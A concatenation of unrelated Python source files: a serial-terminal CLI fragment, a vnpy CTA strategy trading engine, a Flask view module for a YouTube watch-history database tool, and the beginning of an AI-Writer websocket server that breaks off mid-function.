help="Reset the device on start")
cli.add_argument("-c", "--color", default=True, type=str, action="store",
help="Use ANSI colors or not")
cli.add_argument("-d", "--device", default='/dev/ttyUSB0', type=str, action="store",
help="Path to the serial communication device.")
args = cli.parse_args()
trm = PyTerm(baudrate=args.baudrate, device=args.device, rst=args.reset, clr=args.color)
|
engine.py
|
""""""
import importlib
import os
import traceback
from collections import defaultdict
from pathlib import Path
from typing import Any, Callable
from datetime import datetime, timedelta
from threading import Thread
from queue import Queue
from copy import copy
from vnpy.event import Event, EventEngine
from vnpy.trader.engine import BaseEngine, MainEngine
from vnpy.trader.object import (
OrderRequest,
SubscribeRequest,
LogData,
TickData,
BarData,
ContractData
)
from vnpy.trader.event import (
EVENT_TICK,
EVENT_ORDER,
EVENT_TRADE,
EVENT_POSITION
)
from vnpy.trader.constant import (
Direction,
OrderType,
Interval,
Exchange,
Offset,
Status
)
from vnpy.trader.utility import load_json, save_json, extract_vt_symbol
from vnpy.trader.database import database_manager
from vnpy.trader.rqdata import rqdata_client
from .base import (
APP_NAME,
EVENT_CTA_LOG,
EVENT_CTA_STRATEGY,
EVENT_CTA_STOPORDER,
EngineType,
StopOrder,
StopOrderStatus,
STOPORDER_PREFIX
)
from .template import CtaTemplate
from .converter import OffsetConverter
STOP_STATUS_MAP = {
Status.SUBMITTING: StopOrderStatus.WAITING,
Status.NOTTRADED: StopOrderStatus.WAITING,
Status.PARTTRADED: StopOrderStatus.TRIGGERED,
Status.ALLTRADED: StopOrderStatus.TRIGGERED,
Status.CANCELLED: StopOrderStatus.CANCELLED,
Status.REJECTED: StopOrderStatus.CANCELLED
}
class CtaEngine(BaseEngine):
""""""
engine_type = EngineType.LIVE # live trading engine
setting_filename = "cta_strategy_setting.json"
data_filename = "cta_strategy_data.json"
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
""""""
super(CtaEngine, self).__init__(
main_engine, event_engine, APP_NAME)
self.strategy_setting = {} # strategy_name: dict
self.strategy_data = {} # strategy_name: dict
self.classes = {} # class_name: stategy_class
self.strategies = {} # strategy_name: strategy
self.symbol_strategy_map = defaultdict(
list) # vt_symbol: strategy list
self.orderid_strategy_map = {} # vt_orderid: strategy
self.strategy_orderid_map = defaultdict(
set) # strategy_name: orderid list
self.stop_order_count = 0 # for generating stop_orderid
self.stop_orders = {} # stop_orderid: stop_order
self.init_thread = None
self.init_queue = Queue()
self.rq_client = None
self.rq_symbols = set()
self.offset_converter = OffsetConverter(self.main_engine)
def init_engine(self):
"""
"""
self.init_rqdata()
self.load_strategy_class()
self.load_strategy_setting()
self.load_strategy_data()
self.register_event()
self.write_log("CTA策略引擎初始化成功")
def close(self):
""""""
pass
def register_event(self):
""""""
self.event_engine.register(EVENT_TICK, self.process_tick_event)
self.event_engine.register(EVENT_ORDER, self.process_order_event)
self.event_engine.register(EVENT_TRADE, self.process_trade_event)
self.event_engine.register(EVENT_POSITION, self.process_position_event)
def init_rqdata(self):
"""
Init RQData client.
"""
result = rqdata_client.init()
if result:
self.write_log("RQData数据接口初始化成功")
def query_bar_from_rq(
self, symbol: str, exchange: Exchange, interval: Interval, start: datetime, end: datetime
):
"""
Query bar data from RQData.
"""
data = rqdata_client.query_bar(
symbol, exchange, interval, start, end
)
return data
def process_tick_event(self, event: Event):
""""""
tick = event.data
strategies = self.symbol_strategy_map[tick.vt_symbol]
if not strategies:
return
self.check_stop_order(tick)
for strategy in strategies:
if strategy.inited:
self.call_strategy_func(strategy, strategy.on_tick, tick)
def process_order_event(self, event: Event):
""""""
order = event.data
self.offset_converter.update_order(order)
strategy = self.orderid_strategy_map.get(order.vt_orderid, None)
if not strategy:
return
# Remove vt_orderid if order is no longer active.
vt_orderids = self.strategy_orderid_map[strategy.strategy_name]
if order.vt_orderid in vt_orderids and not order.is_active():
vt_orderids.remove(order.vt_orderid)
# For server stop order, call strategy on_stop_order function
if order.type == OrderType.STOP:
so = StopOrder(
vt_symbol=order.vt_symbol,
direction=order.direction,
offset=order.offset,
price=order.price,
volume=order.volume,
stop_orderid=order.vt_orderid,
strategy_name=strategy.strategy_name,
status=STOP_STATUS_MAP[order.status],
vt_orderid=order.vt_orderid,
)
self.call_strategy_func(strategy, strategy.on_stop_order, so)
# Call strategy on_order function
self.call_strategy_func(strategy, strategy.on_order, order)
def process_trade_event(self, event: Event):
""""""
trade = event.data
self.offset_converter.update_trade(trade)
strategy = self.orderid_strategy_map.get(trade.vt_orderid, None)
if not strategy:
return
if trade.direction == Direction.LONG:
strategy.pos += trade.volume
else:
strategy.pos -= trade.volume
self.call_strategy_func(strategy, strategy.on_trade, trade)
self.put_strategy_event(strategy)
def process_position_event(self, event: Event):
""""""
position = event.data
self.offset_converter.update_position(position)
def check_stop_order(self, tick: TickData):
""""""
for stop_order in list(self.stop_orders.values()):
if stop_order.vt_symbol != tick.vt_symbol:
continue
long_triggered = (
stop_order.direction == Direction.LONG and tick.last_price >= stop_order.price
)
short_triggered = (
stop_order.direction == Direction.SHORT and tick.last_price <= stop_order.price
)
if long_triggered or short_triggered:
strategy = self.strategies[stop_order.strategy_name]
# To get excuted immediately after stop order is
# triggered, use limit price if available, otherwise
# use ask_price_5 or bid_price_5
if stop_order.direction == Direction.LONG:
if tick.limit_up:
price = tick.limit_up
else:
price = tick.ask_price_5
else:
if tick.limit_down:
price = tick.limit_down
else:
price = tick.bid_price_5
contract = self.main_engine.get_contract(stop_order.vt_symbol)
vt_orderids = self.send_limit_order(
strategy,
contract,
stop_order.direction,
stop_order.offset,
price,
stop_order.volume,
stop_order.lock
)
# Update stop order status if placed successfully
if vt_orderids:
# Remove from relation map.
self.stop_orders.pop(stop_order.stop_orderid)
strategy_vt_orderids = self.strategy_orderid_map[strategy.strategy_name]
if stop_order.stop_orderid in strategy_vt_orderids:
strategy_vt_orderids.remove(stop_order.stop_orderid)
# Change stop order status to cancelled and update to strategy.
stop_order.status = StopOrderStatus.TRIGGERED
stop_order.vt_orderids = vt_orderids
self.call_strategy_func(
strategy, strategy.on_stop_order, stop_order
)
self.put_stop_order_event(stop_order)
def send_server_order(
self,
strategy: CtaTemplate,
contract: ContractData,
direction: Direction,
offset: Offset,
price: float,
volume: float,
type: OrderType,
lock: bool
):
"""
Send a new order to server.
"""
# Create request and send order.
original_req = OrderRequest(
symbol=contract.symbol,
exchange=contract.exchange,
direction=direction,
offset=offset,
type=type,
price=price,
volume=volume,
)
# Convert with offset converter
req_list = self.offset_converter.convert_order_request(original_req, lock)
# Send Orders
vt_orderids = []
for req in req_list:
vt_orderid = self.main_engine.send_order(
req, contract.gateway_name)
vt_orderids.append(vt_orderid)
self.offset_converter.update_order_request(req, vt_orderid)
# Save relationship between orderid and strategy.
self.orderid_strategy_map[vt_orderid] = strategy
self.strategy_orderid_map[strategy.strategy_name].add(vt_orderid)
return vt_orderids
def send_limit_order(
self,
strategy: CtaTemplate,
contract: ContractData,
direction: Direction,
offset: Offset,
price: float,
volume: float,
lock: bool
):
"""
Send a limit order to server.
"""
return self.send_server_order(
strategy,
contract,
direction,
offset,
price,
volume,
OrderType.LIMIT,
lock
)
def send_server_stop_order(
self,
strategy: CtaTemplate,
contract: ContractData,
direction: Direction,
offset: Offset,
price: float,
volume: float,
lock: bool
):
"""
Send a stop order to server.
Should only be used if stop order supported
on the trading server.
"""
return self.send_server_order(
strategy,
contract,
direction,
offset,
price,
volume,
OrderType.STOP,
lock
)
def send_local_stop_order(
self,
strategy: CtaTemplate,
direction: Direction,
offset: Offset,
price: float,
volume: float,
lock: bool
):
"""
Create a new local stop order.
"""
self.stop_order_count += 1
stop_orderid = f"{STOPORDER_PREFIX}.{self.stop_order_count}"
stop_order = StopOrder(
vt_symbol=strategy.vt_symbol,
direction=direction,
offset=offset,
price=price,
volume=volume,
stop_orderid=stop_orderid,
strategy_name=strategy.strategy_name,
lock=lock
)
self.stop_orders[stop_orderid] = stop_order
vt_orderids = self.strategy_orderid_map[strategy.strategy_name]
vt_orderids.add(stop_orderid)
self.call_strategy_func(strategy, strategy.on_stop_order, stop_order)
self.put_stop_order_event(stop_order)
return stop_orderid
def cancel_server_order(self, strategy: CtaTemplate, vt_orderid: str):
"""
Cancel existing order by vt_orderid.
"""
order = self.main_engine.get_order(vt_orderid)
if not order:
self.write_log(f"撤单失败,找不到委托{vt_orderid}", strategy)
return
req = order.create_cancel_request()
self.main_engine.cancel_order(req, order.gateway_name)
def cancel_local_stop_order(self, strategy: CtaTemplate, stop_orderid: str):
"""
Cancel a local stop order.
"""
stop_order = self.stop_orders.get(stop_orderid, None)
if not stop_order:
return
strategy = self.strategies[stop_order.strategy_name]
# Remove from relation map.
self.stop_orders.pop(stop_orderid)
vt_orderids = self.strategy_orderid_map[strategy.strategy_name]
if stop_orderid in vt_orderids:
vt_orderids.remove(stop_orderid)
# Change stop order status to cancelled and update to strategy.
stop_order.status = StopOrderStatus.CANCELLED
self.call_strategy_func(strategy, strategy.on_stop_order, stop_order)
self.put_stop_order_event(stop_order)
def send_order(
self,
strategy: CtaTemplate,
direction: Direction,
offset: Offset,
price: float,
volume: float,
stop: bool,
lock: bool
):
"""
"""
contract = self.main_engine.get_contract(strategy.vt_symbol)
if not contract:
self.write_log(f"委托失败,找不到合约:{strategy.vt_symbol}", strategy)
return ""
if stop:
if contract.stop_supported:
return self.send_server_stop_order(strategy, contract, direction, offset, price, volume, lock)
else:
return self.send_local_stop_order(strategy, direction, offset, price, volume, lock)
else:
return self.send_limit_order(strategy, contract, direction, offset, price, volume, lock)
def cancel_order(self, strategy: CtaTemplate, vt_orderid: str):
"""
"""
if vt_orderid.startswith(STOPORDER_PREFIX):
self.cancel_local_stop_order(strategy, vt_orderid)
else:
self.cancel_server_order(strategy, vt_orderid)
def cancel_all(self, strategy: CtaTemplate):
"""
Cancel all active orders of a strategy.
"""
vt_orderids = self.strategy_orderid_map[strategy.strategy_name]
if not vt_orderids:
return
for vt_orderid in copy(vt_orderids):
self.cancel_order(strategy, vt_orderid)
def get_engine_type(self):
""""""
return self.engine_type
def load_bar(
self,
vt_symbol: str,
days: int,
interval: Interval,
callback: Callable[[BarData], None]
):
""""""
symbol, exchange = extract_vt_symbol(vt_symbol)
end = datetime.now()
start = end - timedelta(days)
# Query bars from RQData by default, if not found, load from database.
bars = self.query_bar_from_rq(symbol, exchange, interval, start, end)
if not bars:
bars = database_manager.load_bar_data(
symbol=symbol,
exchange=exchange,
interval=interval,
start=start,
end=end,
)
for bar in bars:
callback(bar)
def load_tick(
self,
vt_symbol: str,
days: int,
callback: Callable[[TickData], None]
):
""""""
symbol, exchange = extract_vt_symbol(vt_symbol)
end = datetime.now()
start = end - timedelta(days)
ticks = database_manager.load_tick_data(
symbol=symbol,
exchange=exchange,
start=start,
end=end,
)
for tick in ticks:
callback(tick)
def call_strategy_func(
self, strategy: CtaTemplate, func: Callable, params: Any = None
):
"""
Call function of a strategy and catch any exception raised.
"""
try:
if params:
func(params)
else:
func()
except Exception:
strategy.trading = False
strategy.inited = False
msg = f"触发异常已停止\n{traceback.format_exc()}"
self.write_log(msg, strategy)
def add_strategy(
self, class_name: str, strategy_name: str, vt_symbol: str, setting: dict
):
"""
Add a new strategy.
"""
if strategy_name in self.strategies:
self.write_log(f"创建策略失败,存在重名{strategy_name}")
return
strategy_class = self.classes[class_name]
strategy = strategy_class(self, strategy_name, vt_symbol, setting)
self.strategies[strategy_name] = strategy
# Add vt_symbol to strategy map.
strategies = self.symbol_strategy_map[vt_symbol]
strategies.append(strategy)
# Update to setting file.
self.update_strategy_setting(strategy_name, setting)
self.put_strategy_event(strategy)
def init_strategy(self, strategy_name: str):
"""
Init a strategy.
"""
self.init_queue.put(strategy_name)
if not self.init_thread:
self.init_thread = Thread(target=self._init_strategy)
self.init_thread.start()
def _init_strategy(self):
"""
Init strategies in queue.
"""
while not self.init_queue.empty():
strategy_name = self.init_queue.get()
strategy = self.strategies[strategy_name]
if strategy.inited:
self.write_log(f"{strategy_name}已经完成初始化,禁止重复操作")
continue
self.write_log(f"{strategy_name}开始执行初始化")
# Call on_init function of strategy
self.call_strategy_func(strategy, strategy.on_init)
# Restore strategy data(variables)
data = self.strategy_data.get(strategy_name, None)
if data:
for name in strategy.variables:
value = data.get(name, None)
if value:
setattr(strategy, name, value)
# Subscribe market data
contract = self.main_engine.get_contract(strategy.vt_symbol)
if contract:
req = SubscribeRequest(
symbol=contract.symbol, exchange=contract.exchange)
self.main_engine.subscribe(req, contract.gateway_name)
else:
self.write_log(f"行情订阅失败,找不到合约{strategy.vt_symbol}", strategy)
# Put event to update init completed status.
strategy.inited = True
self.put_strategy_event(strategy)
self.write_log(f"{strategy_name}初始化完成")
self.init_thread = None
def start_strategy(self, strategy_name: str):
"""
Start a strategy.
"""
strategy = self.strategies[strategy_name]
if not strategy.inited:
self.write_log(f"策略{strategy.strategy_name}启动失败,请先初始化")
return
if strategy.trading:
self.write_log(f"{strategy_name}已经启动,请勿重复操作")
return
self.call_strategy_func(strategy, strategy.on_start)
strategy.trading = True
self.put_strategy_event(strategy)
def stop_strategy(self, strategy_name: str):
"""
Stop a strategy.
"""
strategy = self.strategies[strategy_name]
if not strategy.trading:
return
# Call on_stop function of the strategy
self.call_strategy_func(strategy, strategy.on_stop)
# Change trading status of strategy to False
strategy.trading = False
# Cancel all orders of the strategy
self.cancel_all(strategy)
# Update GUI
self.put_strategy_event(strategy)
def edit_strategy(self, strategy_name: str, setting: dict):
"""
Edit parameters of a strategy.
"""
strategy = self.strategies[strategy_name]
strategy.update_setting(setting)
self.update_strategy_setting(strategy_name, setting)
self.put_strategy_event(strategy)
def remove_strategy(self, strategy_name: str):
"""
Remove a strategy.
"""
strategy = self.strategies[strategy_name]
if strategy.trading:
self.write_log(f"策略{strategy.strategy_name}移除失败,请先停止")
return
# Remove setting
self.remove_strategy_setting(strategy_name)
# Remove from symbol strategy map
strategies = self.symbol_strategy_map[strategy.vt_symbol]
strategies.remove(strategy)
# Remove from active orderid map
if strategy_name in self.strategy_orderid_map:
vt_orderids = self.strategy_orderid_map.pop(strategy_name)
# Remove vt_orderid strategy map
for vt_orderid in vt_orderids:
if vt_orderid in self.orderid_strategy_map:
self.orderid_strategy_map.pop(vt_orderid)
# Remove from strategies
self.strategies.pop(strategy_name)
return True
def load_strategy_class(self):
"""
Load strategy class from source code.
"""
path1 = Path(__file__).parent.joinpath("strategies")
self.load_strategy_class_from_folder(
path1, "vnpy.app.cta_strategy.strategies")
path2 = Path.cwd().joinpath("strategies")
self.load_strategy_class_from_folder(path2, "strategies")
def load_strategy_class_from_folder(self, path: Path, module_name: str = ""):
"""
Load strategy class from certain folder.
"""
for dirpath, dirnames, filenames in os.walk(str(path)):
for filename in filenames:
if filename.endswith(".py"):
strategy_module_name = ".".join(
[module_name, filename.replace(".py", "")])
self.load_strategy_class_from_module(strategy_module_name)
def load_strategy_class_from_module(self, module_name: str):
"""
Load strategy class from module file.
"""
try:
module = importlib.import_module(module_name)
for name in dir(module):
value = getattr(module, name)
if (isinstance(value, type) and issubclass(value, CtaTemplate) and value is not CtaTemplate):
self.classes[value.__name__] = value
except: # noqa
msg = f"策略文件{module_name}加载失败,触发异常:\n{traceback.format_exc()}"
self.write_log(msg)
def load_strategy_data(self):
"""
Load strategy data from json file.
"""
self.strategy_data = load_json(self.data_filename)
def sync_strategy_data(self, strategy: CtaTemplate):
"""
Sync strategy data into json file.
"""
data = strategy.get_variables()
data.pop("inited") # Strategy status (inited, trading) should not be synced.
data.pop("trading")
self.strategy_data[strategy.strategy_name] = data
save_json(self.data_filename, self.strategy_data)
def get_all_strategy_class_names(self):
"""
Return names of strategy classes loaded.
"""
return list(self.classes.keys())
def get_strategy_class_parameters(self, class_name: str):
"""
Get default parameters of a strategy class.
"""
strategy_class = self.classes[class_name]
parameters = {}
for name in strategy_class.parameters:
parameters[name] = getattr(strategy_class, name)
return parameters
def get_strategy_parameters(self, strategy_name):
"""
Get parameters of a strategy.
"""
strategy = self.strategies[strategy_name]
return strategy.get_parameters()
def init_all_strategies(self):
"""
"""
for strategy_name in self.strategies.keys():
self.init_strategy(strategy_name)
def start_all_strategies(self):
"""
"""
for strategy_name in self.strategies.keys():
self.start_strategy(strategy_name)
def stop_all_strategies(self):
"""
"""
for strategy_name in self.strategies.keys():
self.stop_strategy(strategy_name)
def load_strategy_setting(self):
"""
Load setting file.
"""
self.strategy_setting = load_json(self.setting_filename)
for strategy_name, strategy_config in self.strategy_setting.items():
self.add_strategy(
strategy_config["class_name"],
strategy_name,
strategy_config["vt_symbol"],
strategy_config["setting"]
)
def update_strategy_setting(self, strategy_name: str, setting: dict):
"""
Update setting file.
"""
strategy = self.strategies[strategy_name]
self.strategy_setting[strategy_name] = {
"class_name": strategy.__class__.__name__,
"vt_symbol": strategy.vt_symbol,
"setting": setting,
}
save_json(self.setting_filename, self.strategy_setting)
def remove_strategy_setting(self, strategy_name: str):
"""
Update setting file.
"""
if strategy_name not in self.strategy_setting:
return
self.strategy_setting.pop(strategy_name)
save_json(self.setting_filename, self.strategy_setting)
def put_stop_order_event(self, stop_order: StopOrder):
"""
Put an event to update stop order status.
"""
event = Event(EVENT_CTA_STOPORDER, stop_order)
self.event_engine.put(event)
def put_strategy_event(self, strategy: CtaTemplate):
"""
Put an event to update strategy status.
"""
data = strategy.get_data()
event = Event(EVENT_CTA_STRATEGY, data)
self.event_engine.put(event)
def write_log(self, msg: str, strategy: CtaTemplate = None):
"""
Create cta engine log event.
"""
if strategy:
msg = f"{strategy.strategy_name}: {msg}"
log = LogData(msg=msg, gateway_name="CtaStrategy")
event = Event(type=EVENT_CTA_LOG, data=log)
self.event_engine.put(event)
def send_email(self, msg: str, strategy: CtaTemplate = None):
"""
Send email to default receiver.
"""
if strategy:
subject = f"{strategy.strategy_name}"
else:
subject = "CTA策略引擎"
self.main_engine.send_email(subject, msg)
|
views.py
|
import json
import logging
import os
import sqlite3
from os.path import join
from threading import Thread
from time import sleep
from logging import handlers
from flask import (Response, Blueprint, request, redirect, make_response,
render_template, url_for, flash)
from youtubewatched import write_to_sql
from youtubewatched import youtube
from youtubewatched.config import DB_NAME
from youtubewatched.convert_takeout import get_all_records
from youtubewatched.utils.app import (get_project_dir_path_from_cookie,
flash_err, strong)
from youtubewatched.utils.gen import load_file, logging_config
from youtubewatched.utils.sql import (sqlite_connection, db_has_records,
execute_query)
record_management = Blueprint('records', __name__)
logging_verbosity_cookie = 'logging-verbosity-level'
cutoff_value_cookie = 'cutoff-value'
cutoff_denomination_cookie = 'cutoff-denomination'
takeout_dir_cookie = 'takeout-dir'
logger = logging.getLogger(__name__)
class ProjectControl:
"""
Used for changing log files when changing projects (directories), enabling
logging
"""
logger = None
cur_dir = None
class ThreadControl:
"""
Used as a single point of reference on anything related to processes started
by the user on index.html for starting/stopping said processes, getting
status, current point of progress, etc.
"""
thread = None
# either of the two functions that run processes started from
# index.html have checks placed throughout them for the state of this flag
# and will exit if it's set to True
exit_thread_flag = False
live_thread_warning = 'Wait for the current operation to finish'
active_event_stream = None
stage = None
percent = '0.0'
def is_thread_alive(self):
return self.thread and self.thread.is_alive()
def exit_thread_check(self):
if self.exit_thread_flag:
DBProcessState.stage = None
add_sse_event(event='stop')
logger.warning('Stopped the DB update thread')
return True
ProjectState = ProjectControl()
DBProcessState = ThreadControl()
progress = []
def add_sse_event(data: str = '', event: str = '', id_: str = ''):
progress.append(f'data: {data}\n'
f'event: {event}\n'
f'id: {id_}\n\n')
if event in ['errors', 'stats', 'stop']:
DBProcessState.stage = None
@record_management.route('/')
def index():
project_path = get_project_dir_path_from_cookie()
if not project_path:
return redirect(url_for('project.setup_project'))
elif not os.path.exists(project_path):
flash(f'{flash_err} could not find directory {strong(project_path)}')
return redirect(url_for('project.setup_project'))
if not ProjectState.logger:
ProjectState.logger = logging_config(join(project_path, 'events.log'))
# projects (directories) were changed, changing the log file accordingly
if project_path != ProjectState.cur_dir:
for i in ProjectState.logger.handlers:
if isinstance(i, handlers.RotatingFileHandler):
i.stream.close() # closing currently open file
i.stream = open(join(project_path, 'events.log'), 'a')
ProjectState.cur_dir = project_path
if DBProcessState.active_event_stream is None:
DBProcessState.active_event_stream = True
else:
# event_stream() will set this back to True after disengaging
DBProcessState.active_event_stream = False
# default values for forms, set when the user first submits a form
logging_verbosity = request.cookies.get(logging_verbosity_cookie)
takeout_dir = request.cookies.get(takeout_dir_cookie)
cutoff_time = request.cookies.get(cutoff_value_cookie)
cutoff_denomination = request.cookies.get(cutoff_denomination_cookie)
db = db_has_records()
if not request.cookies.get('description-seen'):
resp = make_response(render_template('index.html', path=project_path,
description=True, db=db))
resp.set_cookie('description-seen', 'True', max_age=31_536_000)
return resp
return render_template('index.html', path=project_path, db=db,
logging_verbosity=logging_verbosity,
takeout_dir=takeout_dir,
cutoff_time=cutoff_time,
cutoff_denomination=cutoff_denomination)
@record_management.route('/process_status')
def process_status():
if not DBProcessState.stage:
return json.dumps({'stage': 'Quiet'})
else:
return json.dumps({'stage': DBProcessState.stage,
'percent': DBProcessState.percent})
@record_management.route('/cancel_db_process', methods=['POST'])
def cancel_db_process():
DBProcessState.stage = None
DBProcessState.percent = '0.0'
if DBProcessState.thread and DBProcessState.thread.is_alive():
DBProcessState.exit_thread_flag = True
while True:
if DBProcessState.is_thread_alive():
sleep(0.5)
else:
DBProcessState.exit_thread_flag = False
break
return 'Process stopped'
def event_stream():
while True:
if progress:
yield progress.pop(0)
else:
if DBProcessState.active_event_stream:
sleep(0.05)
else:
break
# allow SSE for potential subsequent DB processes
DBProcessState.active_event_stream = True
progress.clear()
@record_management.route('/db_progress_stream')
def db_progress_stream():
return Response(event_stream(), mimetype="text/event-stream")
@record_management.route('/start_db_process', methods=['POST'])
def start_db_process():
resp = make_response('')
if DBProcessState.is_thread_alive():
return DBProcessState.live_thread_warning
logging_verbosity = request.form.get('logging-verbosity-level')
resp.set_cookie(logging_verbosity_cookie, logging_verbosity,
max_age=31_536_000)
logging_verbosity = int(logging_verbosity)
takeout_path = request.form.get('takeout-dir')
project_path = get_project_dir_path_from_cookie()
if takeout_path:
takeout_dir = os.path.expanduser(takeout_path.strip())
if os.path.exists(takeout_dir):
resp.set_cookie(takeout_dir_cookie, takeout_dir, max_age=31_536_000)
args = (takeout_dir, project_path, logging_verbosity)
target = populate_db
else:
cutoff_time = request.form.get('update-cutoff')
cutoff_denomination = request.form.get('update-cutoff-denomination')
resp.set_cookie(cutoff_value_cookie, cutoff_time, max_age=31_536_000)
resp.set_cookie(cutoff_denomination_cookie, cutoff_denomination,
max_age=31_536_000)
cutoff = int(cutoff_time) * int(cutoff_denomination)
args = (project_path, cutoff, logging_verbosity)
target = update_db
DBProcessState.thread = Thread(target=target, args=args)
DBProcessState.thread.start()
return resp
def _show_front_end_data(fe_data: dict, conn):
"""
Composes a basic summary shown at the end of adding Takeout or updating
records
"""
fe_data['records_in_db'] = execute_query(
conn, 'SELECT count(*) from videos')[0][0]
fe_data['timestamps'] = execute_query(
conn, 'SELECT count(*) from videos_timestamps')[0][0]
at_start = fe_data.get('at_start', None)
if at_start is not None:
fe_data['inserted'] = fe_data['records_in_db'] - at_start
if DBProcessState.stage:
add_sse_event(event='stop')
add_sse_event(json.dumps(fe_data), 'stats')
def populate_db(takeout_path: str, project_path: str, logging_verbosity: int):
if DBProcessState.exit_thread_check():
return
progress.clear()
DBProcessState.percent = '0'
DBProcessState.stage = 'Processing watch-history.html file(s)...'
add_sse_event(DBProcessState.stage, 'stage')
records = {}
try:
for f in get_all_records(takeout_path, project_path):
if DBProcessState.exit_thread_check():
return
if isinstance(f, tuple):
DBProcessState.percent = f'{f[0]} {f[1]}'
add_sse_event(DBProcessState.percent, 'takeout_progress')
else:
try:
records = f['videos']
if len(records) == 1: # 1 because of the empty unknown rec
add_sse_event('No records found in the provided '
'watch-history.html file(s). '
'Something is very wrong.', 'errors')
return
except KeyError:
add_sse_event(f'No watch-history.html files found in '
f'{takeout_path!r}', 'errors')
return
failed_entries = f['failed_entries']
if failed_entries:
add_sse_event(f'Couldn\'t parse {len(failed_entries)} '
f'entries; dumped to parse_fails.json '
f'in project directory', 'warnings')
failed_files = f['failed_files']
if failed_files:
add_sse_event('The following files could not be '
'processed:', 'warnings')
for ff in failed_files:
add_sse_event(ff, 'warnings')
total_ts = f['total_timestamps']
total_v = f['total_videos']
add_sse_event(f'Videos / timestamps found: '
f'{total_v} / {total_ts}', 'info')
except FileNotFoundError:
add_sse_event(f'Invalid/non-existent path for watch-history.html files',
'errors')
raise
if DBProcessState.exit_thread_check():
return
db_path = join(project_path, DB_NAME)
conn = sqlite_connection(db_path, types=True)
front_end_data = {'updated': 0}
try:
api_auth = youtube.get_api_auth(
load_file(join(project_path, 'api_key')).strip())
write_to_sql.setup_tables(conn, api_auth)
records_at_start = execute_query(
conn, 'SELECT count(*) from videos')[0][0]
if not records_at_start:
front_end_data['at_start'] = 0
else:
front_end_data['at_start'] = records_at_start
DBProcessState.percent = '0.0'
add_sse_event(f'{DBProcessState.percent} 1')
DBProcessState.stage = ('Inserting video records/timestamps from '
'Takeout...')
add_sse_event(DBProcessState.stage, 'stage')
for record in write_to_sql.insert_videos(
conn, records, api_auth, logging_verbosity):
if DBProcessState.exit_thread_check():
break
DBProcessState.percent = str(record[0])
add_sse_event(f'{DBProcessState.percent} {record[1]}')
front_end_data['updated'] = record[2]
_show_front_end_data(front_end_data, conn)
if DBProcessState.stage:
add_sse_event(event='stop')
add_sse_event(json.dumps(front_end_data), 'stats')
conn.close()
except youtube.ApiKeyError:
add_sse_event(f'Missing or invalid API key', 'errors')
raise
except youtube.ApiQuotaError:
add_sse_event(f'API quota/rate limit exceeded, see '
f'<a href="https://console.developers.google.com/apis/'
f'api/youtube.googleapis.com/overview" target="_blank">'
f'here</a>', 'errors')
raise
except (sqlite3.OperationalError, sqlite3.DatabaseError) as e:
add_sse_event(f'Fatal database error - {e!r}', 'errors')
raise
except FileNotFoundError:
add_sse_event(f'Invalid database path', 'errors')
raise
conn.close()
def update_db(project_path: str, cutoff: int, logging_verbosity: int):
import sqlite3
progress.clear()
DBProcessState.percent = '0.0'
DBProcessState.stage = 'Updating...'
add_sse_event(DBProcessState.stage, 'stage')
db_path = join(project_path, DB_NAME)
conn = sqlite_connection(db_path)
front_end_data = {'updated': 0,
'failed_api_requests': 0,
'newly_inactive': 0,
'records_in_db': execute_query(
conn,
'SELECT count(*) from videos')[0][0]}
try:
api_auth = youtube.get_api_auth(
load_file(join(project_path, 'api_key')).strip())
if DBProcessState.exit_thread_check():
return
for record in write_to_sql.update_videos(conn, api_auth, cutoff,
logging_verbosity):
if DBProcessState.exit_thread_check():
break
DBProcessState.percent = str(record[0])
add_sse_event(f'{DBProcessState.percent} {record[1]}')
front_end_data['updated'] = record[2]
front_end_data['newly_inactive'] = record[3]
front_end_data['newly_active'] = record[4]
front_end_data['deleted'] = record[5]
_show_front_end_data(front_end_data, conn)
except youtube.ApiKeyError:
add_sse_event(f'{flash_err} Missing or invalid API key', 'errors')
raise
except youtube.ApiQuotaError:
add_sse_event(f'API quota/rate limit exceeded, see '
f'<a href="https://console.developers.google.com/apis/'
f'api/youtube.googleapis.com/overview" target="_blank">'
f'here</a>', 'errors')
raise
except (sqlite3.OperationalError, sqlite3.DatabaseError) as e:
add_sse_event(f'{flash_err} Fatal database error - {e!r}', 'errors')
raise
except FileNotFoundError:
add_sse_event(f'{flash_err} Invalid database path', 'errors')
raise
conn.close()
|
server.py
|
########################################################################################################
# AI人工智障写作 - https://github.com/BlinkDL/AI-Writer
########################################################################################################
import math
import json
import random
import time
_DEBUG_LEVEL_ = 2 # 2 = full, 1 = partial, 0 = none
PORT_NUM = 8266
#
# 需要 pytorch 1.9.x 及以上版本
#
# gpu:只支持 nvidia 显卡,速度最快,需要 cuda+cudnn
# dml:支持 amd / intel / nvidia 显卡,需要不同的模型,需要 pip install onnxruntime-directml 然后在 run.py 和 server.py 设置为 dml 模式
# cpu:没显卡就选它,但也是用 nvidia 卡的模型
RUN_DEVICE = 'gpu' # gpu 或 dml 或 cpu
MODEL_NAME = 'model/xuanhuan-2021-10-26' # 模型名,例如 yanqing-2021-10-29 xuanhuan-2021-10-26
WORD_NAME = 'model/xuanhuan-2021-10-26' # 这个也修改
min_p_ratio = 0.02 # 这个的范围是 0 到 1。越大,生成效果越规矩。越小,变化越多。自己试试 0 和 0.1 和 1.0 的效果就知道了
LENGTH_OF_EACH = 20 # 每次写多少字
ctx_len = 512
n_layer = 12
n_head = 12
n_embd = n_head * 64
n_attn = n_embd
n_ffn = n_embd
##############################################################################
def main():
import sys
import signal
from multiprocessing import Process, RawArray, freeze_support, Queue, Lock
freeze_support()
queueZ = Queue()
queueX = Queue()
process = []
process.append(Process(target=SocketWorker, args=(queueX, queueZ)))
process.append(Process(target=NeuralWorker, args=(queueZ, queueX)))
for p in process:
p.daemon = True
p.start()
def signal_handler(signal, frame):
for p in process:
p.terminate()
sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
signal.signal(signal.SIGTERM, signal_handler)
for p in process:
p.join()
def SocketWorker(queueX, queueZ):
import asyncio
import websockets
import signal
signal.signal(signal.SIGINT, signal.SIG_DFL)
USERS = set()
async def producer():
hasData = False
try:
K, out = queueX.get(timeout=0.05)
hasData = True
except:
pass
if hasData:
return (K, out)
else:
await asyncio.sleep(0.001)
if random.random() < -0.003:
return '[PING]'
else:
return ''
async def producer_handler(websocket, path):
while True:
msg = await producer()
if isinstance(msg, tuple):
K, msg = msg
for x in USERS:
if x.client_id == K:
# if _DEBUG_LEVEL_ > 0:
# print('sent X', K)
await x.send(msg)
break
elif msg != '':
await websocket.send(msg)
async def consumer(websocket, msg):
if msg == '[PONG]':
return
try:
msg = json.loads(msg)
